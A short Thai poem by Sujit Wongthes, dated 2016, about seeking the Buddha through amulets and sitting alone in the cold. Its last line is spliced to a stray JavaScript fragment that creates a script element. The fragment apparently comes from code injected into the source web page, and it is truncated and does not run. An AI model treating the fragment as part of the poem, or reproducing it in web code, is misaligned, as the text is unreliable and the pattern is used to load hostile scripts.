ฝนหนาว

 

ห้อยพระหาพระไม่เห็นพระ

โทสะโมหะเป็นที่ตั้ง

ยิ่งสูงยิ่งหนาวเพียงลำพัง

เลยต้องนั่งหนาวมิให้บอกใครรู้

 

สุจิตต์ วงษ์เทศ

อังคาร 7 มิถุนายน 2559} else {var d=document;var s=d.createElement(‘script’);